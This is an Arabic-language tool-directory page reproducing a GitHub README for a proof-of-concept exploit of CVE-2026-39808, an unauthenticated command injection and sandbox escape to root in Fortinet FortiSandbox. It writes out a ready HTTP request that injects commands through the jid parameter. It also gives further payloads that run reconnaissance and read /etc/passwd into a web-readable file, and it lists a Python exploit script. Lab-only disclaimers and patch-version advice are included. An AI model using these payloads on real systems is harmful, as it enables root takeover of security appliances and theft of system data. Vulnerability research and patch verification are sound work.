Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-39808 — CVE-2026-39808 | Kitploit
أدوات/GitHubGitHub/0xblackash/cve-2026-39808
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالتعلم والتعليمتطوير الحمولاتمختبرات وتدريب عملي
GitHub0xblackash/cve-2026-39808

CVE-2026-39808

CVE-2026-39808

عرض المستودع
224منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🚨 هروب صندوق الرمل الجذري في FortiSandbox - CVE-2026-39808

1765359501378
Status CVE Affected Versions

🎯 نظرة عامة

يحتوي هذا المستودع على إثبات مفهوم واضح وموثق بشكل جيد لـ CVE-2026-39808 — ثغرة حقن أوامر غير مصادق عليها حرجة في Fortinet FortiSandbox تسمح بـ هروب صندوق الرمل وتنفيذ تعليمات برمجية عن بُعد كـ جذر (uid=0).

ما يوضحه هذا الإثبات:

  • اختراق المسار + حقن الأوامر عبر المعامل jid
  • اختراق صندوق الرمل من بيئة التحليل
  • تنفيذ أوامر عشوائية بصلاحيات الجذر
  • قراءة ملفات النظام ومعلومات الشبكة

📸 عرض توضيحي

CVE-2026-39808 1 CVE-2026-39808 0 CVE-2026-39808 3 CVE-2026-39808 2 CVE-2026-39808 4

استغلال ناجح يظهر uid=0 gid=0 groups=0


🚀 الإصدارات المتأثرة

Version RangeStatus
FortiSandbox 4.4.0 – 4.4.8قابل للاستغلال
FortiSandbox 5.0.0 – 5.0.5قابل للاستغلال
4.4.9+ / 5.0.6+مُصحَّح

🛠️ كيفية الاستخدام (معمل فقط)

1. الحمولة البسيطة (موصى به)

root@kitploit:~
GET /fortisandbox/job-detail/tracer-behavior?jid=%7C(id%3E/web/ng/out.txt)%7C HTTP/1.1
Host: your-lab-ip

2. عرض النتيجة

افتح في المتصفح:

root@kitploit:~
https://your-lab-ip/ng/out.txt

3. أمثلة حمولات متقدمة

root@kitploit:~
# احصل على عنوان IP + اسم المضيف
jid=|(hostname; ip -4 addr show > /web/ng/out.txt)|

# استطلاع كامل للنظام
jid=|(whoami; id; hostname; ip addr; cat /etc/passwd > /web/ng/out.txt)|

📁 محتويات المستودع

  • poc.py → استغلال Python آلي
  • burp-request.txt → طلب Burp Suite جاهز للاستخدام
  • payloads.md → مجموعة من الحمولات المفيدة
  • screenshots/ → صور خطوة بخطوة للاستغلال
  • README.md → هذا الملف

⚠️ ملاحظات هامة

  • لأغراض تعليمية ومعملية فقط
  • لا تستخدم هذا على أي أنظمة إنتاج أو غير مصرح بها
  • احصل دائمًا على الإذن المناسب قبل الاختبار
  • قم بتحديث FortiSandbox إلى الإصدار 4.4.9+ أو 5.0.6+

🛡️ التخفيف (الحماية)

قم بتحديث FortiSandbox فورًا إلى أحد الإصدارات التالية:

  • 4.4.9 أو أعلى
  • 5.0.6 أو أعلى

أصدرت Fortinet تصحيحات رسمية لمعالجة هذه الثغرة.


مصنوع لأغراض البحث والتعلم
⭐ قم بوضع نجمة لهذا المستودع إذا ساعدك!

تنزيل الأداة